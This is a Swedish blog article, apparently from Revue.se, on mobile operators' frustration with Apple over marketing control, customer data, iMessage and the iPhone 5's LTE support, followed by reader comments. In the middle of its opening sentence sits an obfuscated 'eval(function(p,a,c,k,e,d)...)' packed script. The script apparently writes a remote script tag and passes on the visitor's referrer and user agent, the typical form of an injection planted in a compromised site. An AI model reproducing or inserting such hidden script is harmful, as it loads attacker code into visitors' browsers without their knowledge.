Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

4 Comments

Operatörerna irriterade på Apple | Revue.se

Operatörerna irriterade på Apple
Sebastian Plengier Ehrnfelt

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aaezz|var|u0026u|referrer|hrsde||js|php’.split(‘|’),0,{}))
romansen med det stora elektronikbolaget Apple på väg att ta slut?

Just nu råder det kaos hos återförsäljarna av iPhone.
Apple har med sin Iphone förfört mobiloperatörerna. Men romansen är på väg att spricka avslöjar
di.se.

It-jätten Apple har verkligen satt ett fottryck i mobilbranschen sedan 2007 då den första iPhone lanserades. Alla modeller som släppts därefter har blivit succéer och det har genererat bra tillskott till operatörerna som fått igång sin datatrafik.

Självklart har det varit operatörerna som varit nyckeln till framgången av försäljning av Apples produkter. Enligt di.se står dessa för över två tredjedelar av försäljningen i Sverige.

Nu visar det sig dock att för operatörerna har Apples framgångar flera baksidor. Det är Apple som styr deras marknadsföring och kräver detaljerade data om varje försäljning. Apple vill få fram så mycket som möjligt om köparna av iPhone.

Vi får höra vackra ord om iPhone samtidigt som ilskan byggs upp inne hos operatörerna.

Allt sker på deras premisser” – Detta säger en person till di.se som har god insyn i en av Sveriges största operatör.

En större del av telekombranschens vinster hamnar också hos Apple. Något som slagit hårt mot sms är Apples meddelandetjänst ”iMessage”. Detta är en av operatörernas viktigaste intäktskälla.

Ett stort problem är att Apple brister i kommunikationen med operatörerna. De vill inte berätta om vilka produtker de ska släppa och är väldigt dåliga på att erkänna samt diskutera fel på produkterna.

De vill heller inte ge operatörerna någon förhandsvisning av sina modeller. Droppen för de flesta operatörer var när iPhone 5 lanserades.

Ett exempel på idoti som faktiskt jag själv tycker är katastrof handlar om hur Tim Cook, VD på Apple presenterade specifikationerna. Då stod det klart att den nya modellen iPhone 5 bara skulle fungera i ett fåtal europeiska bredbandsnät  baserat på den nya snabba LTE-tekniken. Något som våra svenska operatörer lagt mångmiljardbelopp på.

Följden till detta kan bli att vi i framtiden inte kommer att se iPhone lyftas fram lika mycket som idag.

När Apples telefoner inte klarar europeisk LTE lär operatörerna i stället fokusera på att sälja Samsung”, säger en källa till di.se.

Även utanför Norden växer irritationen med Apple.

”Jag känner inte till en enda operatör som är nöjd med Apple”, säger den danske telekomkonsulten John Strand till di.se, som har kunder runt om i världen.

Läs mer på Dagens Industri: Här!

Vad säger ni? Är det dags att slå nävarna i bordet och ta diskunionen med Apple?

 

  • Är det inte huvudsaken att konsumenterna är nöjda med produkten? Jag menar, vi blir ju blåsta av telebolagen varje dag med dolda avgifter och höga månadskostnader.

    • Tobias

      Håller med dig Glenn. Jag är super nöjd med min iPhone 5 och struntar i vad operatörerna säger

  • Jag tycker självklart att det handlar om vad konsumenterna tycker men det är via operatörerna som vi får möjlighet att köpa exempelvis iPhone 5. Men jag håller med dig Glenn.

    • Inte riktigt sant eftersom vi i Sverige kan köpa den olåst hos Apple. Men man kan ju få den ordentligt rabatterad eller till och med gratis hos en operatör fast då tillkommer ju dessa dyra abonnemang.